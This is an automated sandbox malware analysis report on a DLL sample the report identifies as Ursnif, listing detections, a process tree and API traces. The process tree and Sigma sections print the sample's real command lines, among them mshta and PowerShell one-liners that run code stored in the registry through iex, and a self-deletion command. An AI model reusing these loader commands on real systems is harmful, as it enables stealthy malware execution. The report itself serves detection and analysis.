Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
61f113091fd0c.dll

Overview

General Information

Sample Name:61f113091fd0c.dll
Analysis ID:560270
MD5:687f33ac9cb2e8b3c1e7659422caf253
SHA1:472513fe01ecbc2f51d70d762c1992a4a24c6c15
SHA256:d1ca0d9f10382d484d02e90d4d5d987653de42a8c4eb5544e4368e4f1965803c
Tags:dllexeTNT
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Sigma detected: Suspicious Csc.exe Source File Folder
PE / OLE file has an invalid certificate
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6248 cmdline: loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 60 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4768 cmdline: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5064 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 5756 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6100 cmdline: regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 3088 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 5944 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5376 cmdline: rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 4884 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6292 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • control.exe (PID: 3360 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 7156 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 2924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5692 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7084 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1956 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6068 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5364 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6976 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 6092 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 240 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2060 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2328 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 5280 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5276 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6864 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 62 entries

            Sigma Overview

            System Summary

            barindex
            Sigma detected: Windows Shell File Write to Suspicious Folder
            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 7156, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
            Sigma detected: Suspicious Remote Thread Created
            Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 5940, StartAddress: 8DCB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3352
            Sigma detected: MSHTA Spawning Windows Shell
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6092, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 5940
            Sigma detected: Suspicious Call by Ordinal
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 60, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, ProcessId: 4768
            Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
            Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 5940, StartAddress: 8DCB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3352
            Sigma detected: Mshta Spawning Windows Shell
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6092, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 5940
            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4884, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6292
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1664, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline, ProcessId: 6068
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5940, TargetFilename: C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6092, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 5940
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132876952995739408.5940.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Machine Learning detection for sample
            Source: 61f113091fd0c.dllJoe Sandbox ML: detected
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_01C178F2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_031F78F2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_010578F2
            Source: 61f113091fd0c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_046CB190
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_046CB2F7
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_046DD39D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BCB190
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BCB2F7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BDD39D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_05EAB190
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_05EBD39D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_05EAB2F7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_0511B190
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_0512D39D
